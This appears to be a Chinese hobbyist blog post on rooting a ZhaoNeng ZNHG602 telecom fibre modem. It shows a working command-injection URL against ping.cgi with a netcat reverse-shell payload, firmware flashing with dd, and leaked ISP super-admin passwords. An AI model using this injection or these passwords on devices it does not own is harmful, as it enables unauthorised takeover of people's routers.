兆能ZNHG602破解telnet

下方为我的一些尝试，可以直接翻到下边看最终解决方案...当然学习也可以

前几天办了新宽带，电信又拿了个新品牌的光猫，看背面写的是兆能(好吧不认识T_T)

按照惯例打开192.168.1.1:8080 界面，结果自动跳到了新luci界面。用惯用手段获取密码:

(小提示:在80界面密码栏直接输入nE7jA%5m即可登录8080，无需修改用户名)

打开ftp连接光猫，显示Pure_Ftpd(挺先进)，用useradmin登录，看到了熟悉的romfile，下载到电脑发现没有加密！正当我激动之时发现里面并没有telnet设置……通过一番寻找找到8080端口的网页在/usr/share/web下，找到了ftpandTelnet.cgi这个文件，但用浏览器访问不了，电信直接封死了……有关备份和更新的也同样被封死。。。那就只能通过其他方式了。

0.ftp：通过四处寻找脚本发现/var下有Speedtest脚本，可能是手机端测速功能的后端，ftp上传一个反弹shell脚本上去，但手机上点测速并没有效果，而且登录回去发现文件并未被修改。可能ftpd有权限设置

1.ttl：光猫后螺丝只上了两个螺丝，另外一侧是卡上去的(好省钱……)，用一把尺子轻松拆开。正面有几块黑胶，拆开后底下有熟悉的四个触点，还贴心的标上了TX RX，明摆着让你用呢！但putty连上后失望了，需要登录。用e8c和useradmin/admin都显示error，方法不通。

2.网页漏洞：(1)起初以为telnet服务是启动的(nmap显示23端口是filtered)，在luci页面中端口映射127.0.0.1:23至127.0.0.1:23打开23端口，telnet连接后是连接重置……压根telnetd就没起来！

(2)在8080页面有ping.cgi，输入127.0.0.1测试后链接变成了http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=127.0.0.1&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1，关键点:addr可修改！修改地址为diagAddrT=127.0.0.1|ls后并没有出现报错

显示内容正常！直接运行telnetd经过实验什么都没有发生……在窗口看不到错误原因，因此可以尝试寻找可以反弹shell的工具。通过which nc找到nc。尝试直接用nc -e /bin/sh反弹 果不其然没有-e选项。因此用http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=&nc 192.168.1.2 8080|/bin/sh|nc 192.168.1.2 8081&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1成功反弹出shell，但60s后会报错且无法连接，显然不是我们的目的。在nc中再次运行telnetd -l /bin/login 后成功，但telnet依旧无法连接，可能对23端口有封阻。因此修改命令为telnetd -l /bin/login -p 7900，终于能连通。login处useradmin和密码成功登录且为root权限！发现系统内有很多有用的命令，但许多都在openwrt子系统(/opt/upt/framework内，是luci用到的系统)，因此使用下列代码修复path:

export PATH="/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/opt/upt/framework/saf/rootfs/bin:/opt/upt/f
ramework/saf/rootfs/sbin:/opt/upt/framework/saf/rootfs/usr/bin:/opt/upt/framework/saf/rootfs/usr/sbin"

至此破解telnet结束。

(提供一个不需要nc直接网页访问就能开启telnet的链接:链接)

仍需解决的问题:整个系统除了openwrt系统外均为只读和tmpfs结合，无法保持任何文件修改。

==============分割线===============

11.28更新新的破解方式：刷写子系统固件

1.通过前文提供的链接打开telnet

2.下载本人修改好的固件(仅更新busybox和启动脚本，绝无任何挖矿/病毒脚本，若不相信可自行编译。。。)

下载链接(MD5：dcdc95b09ff0bed6cad2aa7adbe22d45请务必进行检查！)

3.利用ftp上传文件(需先在应用与功能中打开FTP)

# 当然 如果有es文件浏览器 winscp什么的也是可以的
# 推荐安装winscp
ftp 192.168.1.1 #登录账号为useradmin 密码在光猫背后
put mtd6new.img /mnt #在ftp连接后输入

4.连接telnet(192.168.1.1 端口号23 可以用putty termius windows自带telnet什么的连接)，输入以下命令

# 登入后输入
md5sum /mnt/mtd6new.img # 如果md5不一致请重新上传
dd if=/mnt/mtd6new.img of=/dev/mtdblock6
# dd if=/mnt/mtd6new.img of=/dev/mtdblock7 非必要 如果上头刷完了重启没用在用 留一个原来系统备份
saf setactive 6 1

刷写时间较长，等运行完成后一定运行sync(会卡一会 无输出) 和 saf info (确保每个[]内不为空)查看刷写是否正常！

5.刷写完成后记得reboot 耐心等待5分钟后连接会出现熟悉的界面：(telnet 192.168.1.1 端口号7900)

修正: 登录账号root 默认密码为空

请务必使用busybox passwd 修改root密码！否则onu暴露在外网被当肉鸡概不负责！

(想不到吧，电信光猫里嵌了个openwrt！)mount发现根目录的确有overlay，剩余45M左右空间可以自由折腾！像做个服务器挂离线下载什么的都可以。cpu属于mips架构，大部分发行版都提供编译器，想要新功能可以自行添加，这里不再赘述。

另，建议插U盘使用,接入后自动挂载在/mnt/xxx 光猫存储寿命有限

注：系统内我自己编译了最新的全功能busybox 如果遇到命令不存在不妨使用busybox+命令试试？命令列表链接 可以用busybox --install -s /bin 注册软连接

opkg电信修改了不可用 需要自己tar xzvf解压ipk手动安装

子系统内dns有问题 我还没有找到解决办法 待补充...

 

2023年:

在光猫主系统(用链接打开的那个telnet)中找到了zysh软件，输入zysh[回车]进入后输入configu<tab> <tab>即可进入配置模式 输入?可以看到很多有趣的功能，在feature<tab>下还有更多配置！这个配置输入save后会真正保存，重启后不失效。输入local<tab> <tab> 1 可以永久打开主系统的telnet！ 如果需要添加功能可以在主系统添加 但是每次重启都要手动再复制启动一次

 

2024年：

超级密码被改了，新的是 

wfaaAVQzjLZm